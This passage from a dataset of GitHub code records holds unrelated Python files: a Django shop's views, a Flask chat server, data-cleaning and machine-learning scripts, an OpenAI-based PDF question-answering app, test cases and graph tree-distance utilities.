range(len(x_unique)):\n N_0_group[i] = Yvar[(Xvar == x_unique[i]) & (Yvar == 0)].count() + 1\n N_1_group[i] = Yvar[(Xvar == x_unique[i]) & (Yvar == 1)].count() + 1\n WOE = np.log((N_0_group / N_0) / (N_1_group / N_1))\n IV = (N_0_group / N_0 - N_1_group / N_1) * WOE\n iv = np.sum(IV)\n return iv, IV, WOE, N_0_group, N_1_group\n","repo_name":"SmartDataLab/DefaultPredict","sub_path":"src/feature/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72692674080","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\"\"\"\n/*\n@author:sun\n@file:test_TS_SR_position_approve_10.py\n@time:2021/09/01\n*/\n\n岗位关闭后,继续审批提交的岗位申请,申请失败\n\n\"\"\"\n\nimport allure\nimport pytest\n\nfrom FastApi.aws.project import Project, Personnel\nfrom FastApi.aws.recruitment import Recruitment\nfrom FastApi.common.logs_handle import Logger\nfrom FastApi.conf import env\nfrom FastApi.scripts.conftest import projectName, postName\n\nlog = Logger().logger\npro = Project()\nrecruit = Recruitment()\nperson_1 = Personnel(projectName, userName=env.USERNAME_PM)\n\n\ndef setup_module(module):\n log.info('-----测试用例预制-----')\n\n\n@pytest.mark.usefixtures('open_init_position')\n@allure.feature('项目招聘')\n@allure.story('岗位审批')\n@allure.title('岗位关闭后,继续审批提交的岗位申请,申请失败')\ndef test_approve():\n \"\"\"\n 前置条件:\n 1- 创建招募岗位,并打开岗位\n 2- 关闭招募岗位\n\n\n 测试步骤:\n 1- 开发人员查看关闭的招募岗位\n\n 预期结果:\n 1- 无法查看\n \"\"\"\n log.info('-----测试用例执行-----')\n\n # 关闭岗位开关\n person_1.operate_recruit(postName, openFlag=False)\n\n # 开发人员查询岗位\n resp = recruit.query_position_by_project(postName, projectName, userName=env.USERNAME_RD_Recruit_1)\n pytest.assume(not resp) # 开发人员无法查看已关闭岗位\n\n\ndef teardown_module(module):\n log.info('-----环境操作-----')\n","repo_name":"nick102401/TaskForce","sub_path":"FastApi/scripts/features/recruitment/positions_approve/test_TS_SR_position_approve_10.py","file_name":"test_TS_SR_position_approve_10.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38689122826","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\n\n# Create your views here.\nfrom .models import Categoria, Producto\n\ndef index(request):\n \n categorias= Categoria.objects.order_by('nombre')\n if request.method == 'POST':\n id_categoria= request.POST.get('categoria_id')\n if id_categoria != 'null':\n product_list= Producto.objects.filter(categoria_id=id_categoria) \n else:\n product_list= Producto.objects.order_by('nombre')\n else:\n product_list= Producto.objects.order_by('nombre')\n \n context= {'product_list': product_list, 'categorias': categorias}\n return render(request, 'product/index.html', context)\n\ndef create(request):\n categorias= Categoria.objects.order_by('nombre')\n context = {'categorias': categorias}\n return render(request, 'product/create.html', context)\n\ndef store(request):\n if request.method == 'POST':\n categoria_id= int(request.POST.get('id_categoria'))\n nombre= request.POST.get('nombre')\n precio= request.POST.get('precio')\n stock= request.POST.get('stock')\n upload= request.POST.get('upload')\n pub_date= '2023-10-13'\n \n Producto.objects.create(\n categoria_id= categoria_id,\n nombre= nombre,\n precio= precio,\n stock= stock,\n upload= upload,\n pub_date= pub_date\n )\n return redirect('index')\n return HttpResponse('ERROR')\n\ndef show(request, id= None):\n producto= Producto.objects.get(id= id)\n \n if producto.stock < 10:\n color= 'text-danger'\n else:\n color= 'text-primary'\n\n context= {\n 'producto': producto,\n 'colorstock': color\n }\n return render(request, 'product/show.html', context)\n \ndef edit(request, id= None):\n categorias= Categoria.objects.order_by('nombre')\n producto= Producto.objects.get(id= id)\n context= {'producto': producto, 'categorias': categorias}\n return render(request, 'product/edit.html', context)\n\n\ndef update(request, id= None):\n if request.method == 'POST':\n categoria_id= int(request.POST.get('id_categoria'))\n nombre= request.POST.get('nombre')\n precio= request.POST.get('precio')\n stock= request.POST.get('stock')\n upload= request.POST.get('upload')\n pub_date= '2023-10-13'\n \n producto= Producto.objects.get(id= id)\n producto.categoria_id= categoria_id\n producto.nombre= nombre\n producto.precio= precio\n producto.stock= stock\n producto.upload= upload\n producto.pub_date= pub_date\n producto.save()\n \n return redirect('index')\n return HttpResponse('ERROR')","repo_name":"adrian-coronel/laboratorio06-django","sub_path":"aplicacion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74322081762","text":"from flask import Flask, send_from_directory, request, jsonify\nfrom flask_socketio import SocketIO, emit, join_room\nfrom flask_cors import CORS \nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport os\nimport datetime\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp = Flask(__name__, static_folder='../../client/build/static')\napp.config['SECRET_KEY'] = 'development key'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'messages.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\nsocket = SocketIO(app)\nCORS(app,resources={r\"/*\":{\"origins\":\"*\"}})\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\n@app.route('/')\ndef serve_static_index():\n return send_from_directory('../../client/build/', 'index.html')\n\n\nclass Message(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n room = db.Column(db.String(80))\n author = db.Column(db.String(120))\n body = db.Column(db.String(140))\n timeStamp = db.Column(db.DateTime, default=datetime.datetime.utcnow)\n\n def __init__(self, room, author, body):\n self.room = room\n self.author = author\n self.body = body\n self.timeStamp = datetime.datetime.utcnow()\n\nclass MessageSchema(ma.Schema):\n class Meta:\n # Fields to expose\n fields = ('room', 'author','body','timeStamp')\n\nmessage_schema = MessageSchema()\nmessages_schema = MessageSchema(many=True)\n\n# endpoint to get user detail by id\n@app.route(\"/user/<id>\", methods=[\"GET\"])\ndef user_detail(id):\n user = User.query.get(id)\n return user_schema.jsonify(user)\n\n# endpoint to create new user\n@app.route(\"/message\", methods=[\"POST\"])\ndef add_message():\n room = request.json['room']\n author = request.json['author']\n body = request.json['body']\n new_message = Message(room, author, body)\n db.session.add(new_message)\n db.session.commit()\n return message_schema.jsonify(new_message)\n\n# endpoint to show all users\n@app.route(\"/message\", methods=[\"GET\"])\ndef get_message():\n all_messages = Message.query.all()\n result = messages_schema.dump(all_messages)\n return jsonify(result.data)\n\n# endpoint to get user detail by id\n@app.route(\"/message/<id>\", methods=[\"GET\"])\ndef message_detail(id):\n message = Message.query.get(id)\n return message_schema.jsonify(user)\n\n@socket.on('connect')\ndef on_connect():\n print('user connected')\n retrieve_active_users()\n\n\ndef retrieve_active_users():\n emit('retrieve_active_users', broadcast=True)\n\n\n@socket.on('activate_user')\ndef on_active_user(data):\n user = data.get('username')\n emit('user_activated', {'user': user}, broadcast=True)\n\n\n@socket.on('deactivate_user')\ndef on_inactive_user(data):\n user = data.get('username')\n emit('user_deactivated', {'user': user}, broadcast=True)\n print (user, \" user_deactivated\")\n\n\n@socket.on('join_room')\ndef on_join(data):\n room = data['room']\n join_room(room)\n emit('open_room', {'room': room}, broadcast=True)\n emit('roomJoined', {'room': room}, broadcast=True)\n\n\n@socket.on('send_message')\ndef on_chat_sent(data):\n room = data['room']\n emit('message_sent', data, room=room)\n\n@socket.on('broadcast_message')\ndef test_message(data):\n emit('message_broadcasted', data, broadcast=True)","repo_name":"glaucopater/chatapp","sub_path":"server/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"7981753189","text":"import pandas as pd\nimport numpy as np\n\ntrainData = pd.read_csv(\"dengue_features_train.csv\")\ntrainLables = pd.read_csv(\"dengue_labels_train.csv\")\ndata = pd.merge(trainData,trainLables, how = 'outer', on = [\"city\", \"year\",\"weekofyear\"])\n\n#replace date with absolute day number\nfrom datetime import datetime\ndef dateToDay(string):\n dt = datetime.strptime(string,\"%Y-%m-%d\")\n first = datetime.strptime(\"1990-04-30\",\"%Y-%m-%d\")\n delta = dt-first\n return delta.days\n\ndataTmp = data[\"week_start_date\"].apply(dateToDay)\ndata2 = data\ndata2[\"week_start_date\"] = dataTmp\n\n#replace city names with numbers\ndata2 = data2.replace({\"sj\":0,\"iq\":1})\n\n#add aditional entry to store whether line conatins a corrected value\ndata2[\"corrected_data\"] = 0\n\n#replace nans with interpolated value where possible\nfor row, rowData in data2.iterrows():\n for col in range(data2.shape[1]):\n value = rowData.iloc[col]\n if not pd.notnull(value) :\n #try to correct value by entries above and below\n valueAbove = data2.iloc[row-1, col]\n valueBelow = data2.iloc[row+1, col]\n if pd.notnull(valueAbove) and pd.notnull(valueBelow):\n data2.iloc[row,col] = (valueAbove+valueBelow)/2\n data2.iloc[row,25] = 1 #marke row as modified\n\n\n#remove rows that still hava a nan entry\ndata2 = data2[~data2.isnull().any(axis=1)]\n\n#separate into two cities\ndataCity1 = data2[:866]\ndataCity2 = data2[866:]\n","repo_name":"dominik31415/dengAI","sub_path":"loadData.py","file_name":"loadData.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19850514705","text":"from PIL import Image\nimport sys\nimport codecs\nimport pyocr\nimport pyocr.builders\nfrom bs4 import BeautifulSoup\n\ntool = pyocr.get_available_tools()[0]\nlangs = tool.get_available_languages()\nlang = langs[24]\n#영어 24 한글 57\nbuilder = pyocr.builders.LineBoxBuilder()\nline_boxes = tool.image_to_string(\n Image.open('final_test.png'),\n lang=lang,\n builder=builder\n)\nprint(\"Will use lang '%s'\" % (lang))\n\n\nwith codecs.open(\"toto4_test.html\", 'w', encoding='utf-8') as file_descriptor:\n builder.write_file(file_descriptor, line_boxes)\nprint(\"complete hocr\")\n\n#soup = BeautifulSoup(open(\"./toto4_test.html\").decode('utf-8'),\"html.parser\")\nwith open(\"./toto4_test.html\",'rb') as html:\n soup = BeautifulSoup(html)\nprint(\"open hocr completed\")\nmr = soup.find_all(class_=\"ocr_line\")\nsizeLine = len(mr)\ni = 0\nresult=0\nsum=0\nprint(\"begining detect\")\ntempSize = 0\n\nwhile i<sizeLine:\n table_temp=mr[i].find_all(class_=\"ocrx_word\")\n tempSize = len(table_temp)\n x=0\n before=0\n after=0\n flag = False\n while x<tempSize:\n tempStr = str(table_temp[x])\n if(tempStr[36]==' '):\n after = 0\n elif(tempStr[37]==' '):\n after=int(tempStr[36:37])\n elif(tempStr[38] == ' '):\n after=int(tempStr[36:38])\n else:\n after=int(tempStr[36:39])\n if(tempSize<1 and after<100):\n flag=True\n break\n sum+=1\n if(x==tempSize-1 and after<before):\n result+=1\n print(\"this line is upsidedown\")\n before=after\n x+=1\n i+=1\n print(\"end of line\")\n del table_temp[:]\n\nfinalResult = (result/sum)*100\nprint(\"finalResult %d\",finalResult)\n\nif(finalResult>50):\n print(\"it is upside down!!\")\nelse:\n print(\"it is alright!!\")","repo_name":"blackbbean/individualStudy1","sub_path":"test1/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31719948709","text":"import gradio as gr\nimport openai\nimport numpy as np\nfrom time import sleep\nimport tiktoken\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\nfrom langchain.document_loaders import UnstructuredPDFLoader\n\nCOMPLETIONS_MODEL = \"gpt-3.5-turbo\"\nEMBEDDING_MODEL = \"text-embedding-ada-002\"\n\n# Initialize the OpenAI API\nopenai.api_key = \"YOUR_OPEN_AI_KEY\"\n\n\n# Function to convert a PDF to text\ndef extract_text_from_pdf(pdf_file, progress=gr.Progress()):\n\n try:\n reader = UnstructuredPDFLoader(pdf_file.name)\n data = reader.load()\n text = data[0].page_content\n\n text_splitter = RecursiveCharacterTextSplitter(\n chunk_size=400,\n chunk_overlap=50,\n length_function=len,\n )\n chunks = text_splitter.create_documents([text])\n\n embed = compute_doc_embeddings(chunks, progress)\n return chunks, embed, \"uploaded\"\n except:\n return None, None, \"\"\n\n\ndef get_embedding(text, model=EMBEDDING_MODEL):\n result = openai.Embedding.create(\n model=model,\n input=text\n )\n return result[\"data\"][0][\"embedding\"]\n\n\ndef compute_doc_embeddings(text, progress):\n \"\"\"\n Create an embedding for each row in the dataframe using the OpenAI Embeddings API.\n\n Return a dictionary that maps between each embedding vector and the index of the row that it corresponds to.\n \"\"\"\n result = {}\n for idx in progress.tqdm(range(len(text))):\n try:\n res = get_embedding(text[idx].page_content)\n except:\n done = False\n while not done:\n sleep(5)\n try:\n res = get_embedding(text[idx].page_content)\n done = True\n except:\n pass\n result[idx] = res\n\n return result\n\n\ndef vector_similarity(x, y):\n \"\"\"\n Returns the similarity between two vectors.\n\n Because OpenAI Embeddings are normalized to length 1, the cosine similarity is the same as the dot product.\n \"\"\"\n return np.dot(np.array(x), np.array(y))\n\n\ndef order_document_sections_by_query_similarity(query, contexts):\n \"\"\"\n Find the query embedding for the supplied query, and compare it against all of the pre-calculated document embeddings\n to find the most relevant sections.\n\n Return the list of document sections, sorted by relevance in descending order.\n \"\"\"\n query_embedding = get_embedding(query)\n\n document_similarities = sorted([\n (vector_similarity(query_embedding, doc_embedding), doc_index) for doc_index, doc_embedding in contexts.items()\n ], reverse=True)\n\n return document_similarities\n\n\nSEPARATOR = \"\\n* \"\nENCODING = \"gpt2\" # encoding for text-davinci-003\n\nencoding = tiktoken.get_encoding(ENCODING)\nseparator_len = len(encoding.encode(SEPARATOR))\nCOMPLETIONS_API_PARAMS = {\n # We use temperature of 0.0 because it gives the most predictable, factual answer.\n \"temperature\": 0.0,\n \"max_tokens\": 300,\n \"model\": COMPLETIONS_MODEL,\n}\n\n\ndef construct_prompt(question, context_embeddings, df):\n \"\"\"\n Fetch relevant\n \"\"\"\n chosen_sections = []\n chosen_sections_len = 0\n chosen_sections_indexes = []\n most_relevant_document_sections = order_document_sections_by_query_similarity(question, context_embeddings)\n\n if \"email\" in question:\n MAX_SECTION_LEN = 2500\n COMPLETIONS_API_PARAMS['max_tokens'] = 1000\n COMPLETIONS_API_PARAMS['temperature'] = 0.5\n header = \"\"\"Write email using the provided context \\n\\nContext:\\n \"\"\"\n elif \"summary\" in question or \"summarize\" in question:\n MAX_SECTION_LEN = 2500\n COMPLETIONS_API_PARAMS['max_tokens'] = 1000\n COMPLETIONS_API_PARAMS['temperature'] = 0.5\n header = \"\"\"Write detailed summary of the provided context \\n\\nContext:\\n \"\"\"\n question = \"\"\n else:\n MAX_SECTION_LEN = 1000\n COMPLETIONS_API_PARAMS['max_tokens'] = 300\n COMPLETIONS_API_PARAMS['temperature'] = 0.0\n header = \"\"\"Answer the question in detail as truthfully as possible, and if the answer is not contained within the text below, say \"I don't know.\"\\n\\nContext:\\n \"\"\"\n\n for _, section_index in most_relevant_document_sections:\n # Add contexts until we run out of space.\n document_section = df[section_index].page_content\n chosen_sections_len += len(document_section) * 0.25 + separator_len\n\n if chosen_sections_len > MAX_SECTION_LEN:\n break\n\n chosen_sections.append(SEPARATOR + document_section.replace(\"\\n\", \" \"))\n chosen_sections_indexes.append(str(section_index))\n\n # Useful diagnostic information\n print(f\"Selected {len(chosen_sections)} document sections:\")\n print(\"\\n\".join(chosen_sections_indexes))\n\n return header + \"\".join(chosen_sections) + \"\\n\\n Q: \" + question + \"\\n A:\"\n\n\ndef answer_query_with_context(\n query,\n df,\n document_embeddings, history,\n openchat, show_prompt=True\n):\n history = history or []\n prompt = construct_prompt(\n query,\n document_embeddings,\n df\n )\n\n if show_prompt:\n print(prompt)\n openchat = openchat or [{\"role\": \"system\", \"content\": \"You are a Q&A assistant\"}]\n openchat.append({\"role\": \"user\", \"content\": prompt})\n response = openai.ChatCompletion.create(\n messages=openchat,\n **COMPLETIONS_API_PARAMS\n )\n openchat.pop()\n openchat.append({\"role\": \"user\", \"content\": query})\n print(COMPLETIONS_API_PARAMS)\n output = response[\"choices\"][0][\"message\"][\"content\"].replace('\\n', '<br>')\n openchat.append({\"role\": \"assistant\", \"content\": output})\n history.append((query, output))\n return history, history, openchat, \"\"\n\n\nwith gr.Blocks() as app:\n history_state = gr.State()\n document = gr.Variable()\n embeddings = gr.Variable()\n chat = gr.Variable()\n with gr.Row():\n upload = gr.File(label=None, interactive=True, elem_id=\"short-upload-box\")\n ext = gr.Textbox(label=\"Progress\")\n\n with gr.Row():\n with gr.Column(scale=3):\n chatbot = gr.Chatbot().style(color_map=(\"#075e54\", \"grey\"))\n\n with gr.Row():\n message = gr.Textbox(label=\"What's on your mind??\",\n placeholder=\"What's the answer to life, the universe, and everything?\",\n lines=1)\n submit = gr.Button(value=\"Send\", variant=\"secondary\").style(full_width=False)\n\n upload.change(extract_text_from_pdf, inputs=[upload], outputs=[document, embeddings, ext])\n message.submit(answer_query_with_context, inputs=[message, document, embeddings, history_state, chat],\n outputs=[chatbot, history_state, chat, message])\n submit.click(answer_query_with_context, inputs=[message, document, embeddings, history_state, chat],\n outputs=[chatbot, history_state, chat, message])\nif __name__ == \"__main__\":\n app.queue().launch(server_name=\"0.0.0.0\", debug=True)","repo_name":"vikaskookna/pdfgpt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13014460800","text":"import glob, os\r\nimport argparse\r\n#ap = argparse.ArgumentParser()\r\n#ap.add_argument(\"-d\", \"--dataset\", required=True,\r\n#\thelp=\"path to input dataset\")\r\n#args = vars(ap.parse_args())\r\n\r\nallfiles = glob.glob('*.mp3')\r\nfor afile in allfiles:\r\n os.rename(afile, 't_'+ afile)\r\n \r\nallfiles = glob.glob('*.mp3')\r\ncount=0\r\nfor afile in allfiles:\r\n new_filename =str(count).zfill(3) + '.mp3'\r\n print (new_filename)\r\n os.rename(afile, new_filename)\r\n count += 1\r\nprint(\"Done\")","repo_name":"dear983604/music2","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36456637963","text":"sentence=\"Hi how are you\"\ninlist=sentence.split(\" \")\n#print(inlist)\noutlist=[]\n\nfor word in inlist:\n tmp=''\n for letter in reversed(word):\n #print(letter)\n tmp=tmp+letter\n outlist.append(tmp)\n\nprint(\" \".join(outlist))\n","repo_name":"abhihimself/pythonic_algos","sub_path":"implementation/rev_every_word_sentence.py","file_name":"rev_every_word_sentence.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5144951824","text":"import joblib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport re\nimport seaborn as sns\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom scipy.sparse import csr_matrix, hstack\nfrom sklearn import metrics\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.neighbors import KNeighborsClassifier, NeighborhoodComponentsAnalysis\nfrom sklearn.preprocessing import LabelEncoder\n\n# file_path = '~/Projects/hau/csstudy/resume-screening-and-classification/knn-trial/datasets/dataset_hr_edited.csv'\nfile_path = '~/Projects/hau/csstudy/resume-screening-and-classification/knn-trial/datasets/Labeled_LiveCareer_Resumes_1076.xlsx'\n\nresumeDataSet = pd.read_excel(file_path)\n\nstop_words = set(stopwords.words('english'))\nstemmer = PorterStemmer()\n\nprint(resumeDataSet['Actual Category'].value_counts())\n\ndef cleanResume(resumeText):\n resumeText = re.sub('http\\S+\\s*', ' ', resumeText) # remove URLs\n resumeText = re.sub('RT|cc', ' ', resumeText) # remove RT and cc\n resumeText = re.sub('#\\S+', '', resumeText) # remove hashtags\n resumeText = re.sub('@\\S+', ' ', resumeText) # remove mentions\n resumeText = re.sub('[%s]' % re.escape(\"\"\"!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\"\"\"), ' ', resumeText) # remove punctuations\n resumeText = re.sub(r'[^\\x00-\\x7f]',r' ', resumeText) \n resumeText = re.sub('\\s+', ' ', resumeText) # remove extra whitespace\n\n words = resumeText.split()\n words = [word for word in words if word.lower() not in stop_words]\n words = [stemmer.stem(word.lower()) for word in words if word.lower() not in stop_words]\n resumeText = ' '.join(words)\n return resumeText\n\nresumeDataSet['cleaned_resume'] = resumeDataSet.Resume.apply(lambda x: cleanResume(x))\n\nle = LabelEncoder()\nresumeDataSet['Actual Category'] = le.fit_transform(resumeDataSet['Actual Category'])\nle_filename = f'label_encoder.joblib'\njoblib.dump(le, le_filename)\n\nrequiredText = resumeDataSet['cleaned_resume'].values\nrequiredTarget = resumeDataSet['Actual Category'].values\n\nword_vectorizer = TfidfVectorizer(\n stop_words='english',\n sublinear_tf=True,\n max_features=18038\n)\n\nword_vectorizer.fit(requiredText)\njoblib.dump(word_vectorizer, 'tfidf_vectorizer.joblib')\nWordFeatures = word_vectorizer.transform(requiredText)\n\n# WordFeatures = WordFeatures.toarray()\nnca = NeighborhoodComponentsAnalysis(n_components=300, random_state=42)\nWordFeatures = nca.fit_transform(WordFeatures.toarray(), requiredTarget)\nnca_filename = f'nca_model.joblib'\njoblib.dump(nca, nca_filename)\n\nX_train,X_test,y_train,y_test = train_test_split(WordFeatures,requiredTarget,random_state=42, test_size=0.2,shuffle=True, stratify=requiredTarget)\nprint(X_train.shape)\nprint(X_test.shape)\n\n# n_neighbors_values = [\n# 1, 3, 5, 7, 9, 11, 13, 15, 17, 19, 21, 23, 25, 27, 29, 31, 33, 35, 37, 39, 41, 43, 45, 47, 49, 51, \n# 53, 55, 57, 59, 61, 63, 65, 67, 69, 71, 73, 75, 77, 79, 81, 83, 85, 87, 89, 91, 93, 95, 97, 99]\n# weights = [\"uniform\", \"distance\"]\n# metric = [\"euclidean\", \"manhattan\", \"minkowski\", \"cosine\"] \n# algorithm = ['ball_tree', 'kd_tree', 'brute']\n\n# Shorlisted Parameter Values\n# n_neighbors_values = [1]\n# weights = [\"uniform\", \"distance\"]\n# metric = [\"manhattan\"]\n# algorithm = ['ball_tree', 'kd_tree', 'brute']\n\n# param_grid = dict(n_neighbors=n_neighbors_values, weights=weights, metric=metric, algorithm=algorithm)\n# knn = KNeighborsClassifier()\n# gs = GridSearchCV(estimator=knn, param_grid=param_grid, scoring=\"accuracy\", verbose=1, cv=10, n_jobs=3)\n# grid_search = gs.fit(X_train, y_train)\n# results_df = pd.DataFrame(grid_search.cv_results_)\n# results_df.to_excel('grid_search_results_with_nca_300_and_top_hyperparameters.xlsx', index=False)\n# # results_df.to_excel('grid_search_results_with_nca_500.xlsx', index=False)\n# # results_df.to_excel('grid_search_results_with_nca_400.xlsx', index=False)\n# # results_df.to_excel('grid_search_results_with_nca_300.xlsx', index=False)\n# # results_df.to_excel('grid_search_results_no_nca.xlsx', index=False)\n# best_score = grid_search.best_score_\n# best_parameters = grid_search.best_params_\n# print(\"Best Score:\", best_score)\n# print(\"Best Parameters:\", best_parameters)\n\nknn = KNeighborsClassifier(n_neighbors=1, \n metric='manhattan',\n weights='uniform',\n # algorithm='ball_tree',\n # algorithm='kd_tree',\n algorithm='brute',\n )\nknn.fit(X_train, y_train)\n\nknnModel_filename = f'knn_model.joblib'\njoblib.dump(knn, knnModel_filename)\n\n# prediction = knn.predict(X_test)\n# print('Accuracy of KNeighbors Classifier on training set: {:.2f}'.format(knn.score(X_train, y_train)))\n# print('Accuracy of KNeighbors Classifier on test set: {:.2f}'.format(knn.score(X_test, y_test)))\n# print(\"\\n Classification report for classifier %s:\\n%s\\n\" % (knn, metrics.classification_report(y_test, prediction)))\n#\n# confusion_matrix = metrics.confusion_matrix(y_test, prediction)\n#\n# plt.figure(figsize=(10, 10))\n# sns.heatmap(confusion_matrix, annot=True, fmt='d', cmap='Blues', xticklabels=le.classes_, yticklabels=le.classes_)\n# plt.xlabel('Predicted')\n# plt.ylabel('True')\n# plt.title('Confusion Matrix')\n# plt.show()\n#\n# print(X_test)\n# print(y_test)\n","repo_name":"chelscelis/resume-screening-and-classification","sub_path":"knn-trial/knn8.py","file_name":"knn8.py","file_ext":"py","file_size_in_byte":5393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34767998534","text":"import random\n\nimport networkx as nx\nimport numpy as np\nimport sklearn.cluster\nimport zss\n\nimport qf.graphs\n\n\ndef all_paths(G, target, maxLen):\n \"\"\"\n Returns an iterator for all paths in G of length <=maxLen with given target. Any such path will be returned\n as a list [x_1,k_1,...,x_n,k_n,x_{n+1}] where x_{n+1}=target, 0<=n<=maxLen, (x_i,x_{i+1}) is\n an arc with key k_i (for all i=1,...,n).\n\n Args:\n G: a `networkx.MultiDiGraph`.\n target: a node of G.\n maxLen (int): the maximum length of the paths returned.\n\n Returns:\n an iterator that returns lists; each returned list will be a non-empty sequence alteranting nodes and arcs of G\n (starting and ending with a node, the last node will always be target) and containing no more than maxLen arcs.\n Every arc will have source equal to the node immediately preceding it, and target equal to the node immediately\n following it. All such lists will be returned, and none of them will be returned more than once. \n\n \"\"\"\n if maxLen > 0:\n for s,t,d in G.in_edges(target, data=True):\n for p in all_paths(G, s, maxLen - 1):\n yield p + [d[\"label\"], target]\n yield [target]\n\ndef in_tree(G, target, maxLen):\n \"\"\"\n Returns a (simple) multidigraph whose nodes are the paths as returned by all_paths(G, target, maxLen), \n and with an arc from [x_1,k_1,...,x_n,k_n,x_{n+1}] to [x_2,k_2,...,x_n,k_n,x_{n+1}] for all n>0.\n\n Args:\n G: a `networkx.MultiDiGraph`.\n target: a node of G.\n maxLen (int): the maximum length of the paths returned.\n\n Returns:\n see above. The graph is the universal total graph of target truncated at depth\n \"\"\"\n Gres = nx.MultiDiGraph()\n if maxLen == 0:\n Gres.add_node(str([target]))\n return Gres\n for p in all_paths(G, target, maxLen):\n if len(p)>1 and not Gres.has_edge(str(p), str(p[2:])):\n Gres.add_edge(str(p), str(p[2:]))\n return Gres\n\n\ndef zss_all_paths(G, target, maxLen, nodeColoring=None):\n \"\"\"\n Same as all_paths, but it returns a zss.Node instead (the root of the tree). All nodes have the same label, unless\n `nodeColoring` is specified (in which case the value of the map is used).\n\n Args:\n G: a `networkx.MultiDiGraph`.\n target: a node of G.\n maxLen (int): the maximum length of the paths returned.\n nodeColoring (dict): if not None, it is a dictionary with nodes as keys; the values are used to label the tree nodes.\n\n Returns:\n a zss.Node that is the root of a tree isomorphic to the universal total graph of G at target, truncated at\n maxLen.\n\n \"\"\"\n if nodeColoring is None:\n node = zss.Node(\"x\")\n else:\n node = zss.Node(nodeColoring[target])\n if maxLen == 0:\n return node \n res = node\n for s,t,k in G.in_edges(target, keys=True):\n res = res.addkid(zss_all_paths(G, s, maxLen - 1, nodeColoring))\n return res\n\ndef zss_tree_dist_alt(G, x, y, maxLen, nodeColoring=None):\n \"\"\"\n Provides the zss.simple_distance between zss_all_paths(G,x,maxLen,nodeColoring) and zss_all_paths(G,y,maxLen,nodeColoring).\n This function is very inefficient, please use `zss_tree_dist` instead.\n\n Args:\n G: a `networkx.MultiDiGraph`.\n target: a node of G.\n maxLen (int): the maximum length of the paths returned.\n nodeColoring (dict): if not None, it is a dictionary with nodes as keys; the values are used to label the tree nodes.\n\n Returns: \n the ZSS (edit) distance between the trees obtained truncating at depth maxLen the universal total graphs of x and y in G.\n \"\"\"\n return zss.simple_distance(zss_all_paths(G, x, maxLen, nodeColoring), zss_all_paths(G, y, maxLen, nodeColoring))\n \ndef cached_zss_dist_matrix_alt(G, t, nodeColoring=None):\n \"\"\"\n Given a graph G and a value t, it computes all the zss_all_paths(G,x,t) trees (for all nodes x of G) and \n computes all-pairs matrix. The matrix is returned as an np.ndarray, along with the list of nodes (in the order \n of indices in the matrix) and a map from nodes to indices.\n This function is very inefficient, please use `cached_zss_dist_matrix` instead.\n\n Args:\n G: a `networkx.MultiDiGraph`.\n t (int): the truncation depth.\n nodeColoring (dict): if not None, it is a dictionary with nodes as keys; the values are used to label the tree nodes.\n\n Returns:\n a tuple (M, nodes, indices), where\n - M is a `numpy.ndarray` of shape (n,n) (where n is the number of nodes)\n - nodes is a list containing all nodes (exactly once)\n - indices is a dict from nodes to indices.\n The entry M[i,j] is the ZSS (tree edit) distance\n between the trucated universal trees at `node[i]` and `node[j]`. \n \"\"\"\n nodes = list(G.nodes)\n n = len(nodes)\n d = {}\n indices = {}\n for i in range(n):\n d[nodes[i]] = zss_all_paths(G, nodes[i], t, nodeColoring)\n indices[nodes[i]] = i\n M=np.ndarray((n, n))\n for i in range(n):\n for j in range(i + 1, n):\n M[i,j] = zss.simple_distance(d[nodes[i]], d[nodes[j]])\n for i in range(n):\n for j in range(i + 1):\n if i == j:\n M[i,j] = 0 \n else:\n M[i,j] = M[j,i]\n return (M, nodes, indices)\n\ndef cached_zss_dist_matrix(G, t, nodeColoring=None, order_label=None):\n \"\"\"\n Given a graph G and a value t, it computes all the zss_all_paths(G,x,t) trees (for all nodes x of G) and \n computes all-pairs matrix. The matrix is returned as an np.ndarray, along with the list of nodes (in the order \n of indices in the matrix) and a map from nodes to indices.\n\n Args:\n G: a `networkx.MultiDiGraph`.\n t (int): the truncation depth.\n nodeColoring (dict): if not None, it is a dictionary with nodes as keys; the values are used to label the tree nodes.\n order_label (str): if not None, every node must have that label as 